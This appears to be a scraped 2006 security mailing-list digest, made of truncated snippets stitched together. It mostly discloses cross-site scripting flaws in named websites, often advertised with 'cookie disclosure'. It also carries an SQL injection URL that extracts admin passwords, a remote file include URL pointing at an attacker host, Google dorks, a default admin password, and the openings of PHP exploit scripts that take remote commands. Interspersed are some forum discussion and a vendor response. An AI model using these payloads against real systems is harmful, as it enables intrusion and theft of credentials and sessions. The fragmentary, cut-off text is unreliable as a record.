http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
credits: EntriKa & The_BeKiR & erne
yes the journal is exploitable aswell
there seem to be no filters on the journal title so you can simply put:
">alert('XSS')
also the other places where you can update your journal etc. don't filter
anything
proof:
http://vampirefreaks.com/journal.php?u=NanoyMaster
webcrawler.com - XSS vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://ww
Palm.com - XSS vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.majo
With Opera 8.54 on Windows XP (all patches) this does increase CPU to
100% utilization. However, the system is still very usable (I opened
Thunderbird to write this while it was open) and simply closing the tab
simply closed the page and CPU utilization returned to idle.
Nathaniel Hasenfus
Ratemylook.co.uk
Homepage:
http://www.ratemylook.co.uk
Affected files:
user.php4
top.php4
hot.php4
toponline.php4
user.php4 XSS vuln with cookie disclosure:
http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own";>">">'>http://yo
About.com
Homepage:
http://www.about.com
Effected files:
Search input box
fullsearch.htm
shortform.htm
forum.aspx
profile_center.asp
posting in the forum
---
Search input box xss vuln with cookie disclosure:
Works by putting the tags in the input box,
Macworld.com - XSS vulnerability
--
Type: Cross site scripting
Rated as: Low Risk
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vie
Ratescene.co.uk
Homepage:
http://www.ratescene.co.uk
Affected files:
input boxes of editing your profile
Profile input boxes XSS vuln with cookie disclosure:
Data isn't sanatized, try entering the code below:
Screenshots:
http://www.
Windowsitpro.com
Homepage:
http://www.windowsitpro.com
Effected files:
Search input box
Downloading whitepapers
Search input box xss vuln with cookie disclosure:
We convert our javascript to hex format so we don't recieve the default "Your
request cannot be processed as this time" error
The phpatm support forum (currently down) advises administrators to put a
.htaccess into the users directory with the following content:
# no one gets in here!
order allow,deny
deny from all
Furthermore the website recommends to rename the "users" directory and change
the corresponding va
example:
http://www.animesuki.com/doc.php/%3Cscript%3Ealert('hi')%3C/script%3E/
hints:
Cookiestealer, redirect people, something, general fun
Facerave.com
Homepage:
http://www.facerave.com
Effected files:
* Profile input boxes
- Self Description box
* Posting a blog entry
* Sending a message
index.php
--
XSS vuln with cookie disclosure via posting a comment:
No filte
# Kurdish Security Advisory
# irc.gigachat.net #kurdhack
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz
$url_path_editor = "$root_url/library/editor/";
$abs_path_editor = "$root/library/editor/";
?>
Proof Of Concept
http://www.site.com/[dcpath]/library/editor/
514.es brings to you the proof of concept for mybb 1.1.2
http://secunia.com/secunia_research/2006-40/advisory/
GET it here: http://www.514.es/download/mybibi.pl
Best regards,
- J
Hotscripts.com
Homepage:
http://www.hotscripts.com
Effected files:
search input box
adding a review
Editing your profile
sending a author a message.
Creating a new listing
XSS vuln with cookie disclosure in search input box:
For a PoC try p
Vendor : www.roostercode.com
version : all version!
BUG :
You can include all html tag ... in chat line !
for example : alert("HI users!")
+
ISO.org - XSS vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.major
If you change:
to:
it will also crash IE 6.x. Don't know about 7 Beta.
-cdh
- Original Message -
From: "Greg Merideth (Forward Technology)" <[EMAIL PROTECTED]>
Date: Monday, June 12, 2006 1:18 pm
Subject: RE: Internet Explorer vulnerbility
To: [EMAIL PROTECTED], bugtraq@securityf
On Sat, 10 Jun 2006, [EMAIL PROTECTED] wrote:
> The current password is not necessary for a successful password change for
> members of gameplay.co.uk which makes changing passwords through scripts as
> easy as tying your shoe lace.
> (https://shop.gameplay.co.uk/gameplay/changepassword.asp)
>
hi5.com
Homepage:
http://www.hi5.com
Affected files:
Input boxes of editing your profile.
XSS Vuln with cookie disclosure:
It seems hi5.com allows alot of html tags to be used on thier site but they
will filter out words like javascript, applet, and iframe tags (which is to be
expected
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello Michal,
On Thu, Jun 08, 2006 at 10:48:18PM +0200, Michal Zalewski wrote:
[...]
> Commercial SSL VPNs are a fairly recent technology that has a
> considerable appeal to various corporations. Because of its novelty,
> however, in a typical setup
Cybersocieties.com
Homepage:
http://www.cybersocieties.com
Effected files:
* Input boxes in profile:
- Full name box
- Occupation box
- MSN box
- Yahoo box
- AIM Box
* Viewing a profile
--
XSS vuln via input boxes in profile:
Apnaspace.com (A myspace type site for arab & indian teens)
Homepage:
http://www.http://www.apnaspace.com
Effected files:
* Comment input box:
* Posting a blog entry:
- Entry title
- Entry body
* Viewing a profile
* Posting a bulletin.
* Commenting on a picture
* Sending mail to
use the searchbox with
">alert('XSS')
eg url:
http://search.gardenweb.com/search/nph-ind.cgi?term=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
Cline Communications Sql injection
-
Site:http://www.celerondude.com/
Demo:http://www.liveelite.com/
-
Sql injection
1,photo_enlarged.php file Photo_ID parameter
2,newsdetail.php file NID parameter
3,staff_photo_enlarged
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "this is called the Sun-Tzu 'trascendental guru meditation'
tecnique\r\n\r\n";
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
Hi
Yes, there must be the XSS heaven :)
I contacted the INCROWD Interactive Media first time in March this year and
they always said, that they will patch it. Unfortunately they didn't do
anything until now and I didn't believe that they will do before someone do
a real nasty hack (using for
Dealgates.com
Homepage:
http://www.dealgates.com
Affected files:
*Input boxes when registering new account
* Search box
-
XSS vuln with cookie disclosure when registering a new account.
To bypass the adding backslashes to ; and ", we use the long U
Housecarers.com
Homepage:
http://housecarers.com
Affected files:
* Posting a Housesit:
- City/Town box
- County/District box
- Suburb box
- City/Town Area box
* Searching for housesitters
* Sending messages to house sitters.
* Viewing member profiles
---
On Fri, 16 Jun 2006, Darren Reed wrote:
From my own mail archives, PHP appears to make up at least 4% of the
email to bugtraq I see - or over 1000 issues since 1995, out of the
25,000 I have saved.
People complain about applications like sendmail...in the same period,
it has been resopnsible
___ ___
\_ _/\_ ___ \ / | \\_ \
|__)_ /\ \//~\/ | \
|\\ \___\Y/|\
/___ / \__ /\___|_ /\___ /
\/ \/ \/ \/
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n";;
echo "dork: \"powered by bitweaver\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to bitweaver\r\n";
ec
Darren Reed said:
> From my own mail archives, PHP appears to make up at least 4% of the
> email to bugtraq I see - or over 1000 issues since 1995, out of the
> 25,000 I have saved.
Do you mean the PHP interpreter? Or applications written in PHP?
I'm not sure how many vulnerabilities were i
On 6/16/06, Darren Reed <[EMAIL PROTECTED]> wrote:
From my own mail archives, PHP appears to make up at least 4%
of the email to bugtraq I see - or over 1000 issues since 1995,
out of the 25,000 I have saved.
People complain about applications like sendmail...in the same
period, it has been res
GreatDomains.com - XSS with cookie disclosure
--
Type: Cross site scripting
Date: June, 16th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-Kurz
webcrawler.com - Cross site scripting vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieir
Netscape.com - Cross site scripting vulnerability
--
Type: Cross site scripting
Date: June, 13th 2006
--
Credits:
--
Discovered by: David "Aesthetico" Vieira-
Simple PHP Poll
http://www.cgixp.tk/
DESCRIPTION:
google dork = "Poewred By: Simple PHP Poll" and "Powered By: Simple PHP Poll"
administrator login path /poll_admin.php login to default admin pass
"administrator" or add to ;
?action=edit&filename=question.txt(questions p
Multiple file include exploits in dotwidgeta Version 2
script type : dotwidgeta Version 2
bug found by : sweet-devil
team : site-down
type : file include
exploits :
index.php
http://www.example.com/path/index.php?file_path=http://yoursite/r
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello,
This is Cisco PSIRT response to the statements made by Thomas
Liam Romanis of Fujitsu Services Limited in their posting to BugTraq on
the 15th June 2006, regarding Cisco Secure ACS LoginProxy.CGI Cross-Site
Scripting Vulnerability, locat
41 matches
Mail list logo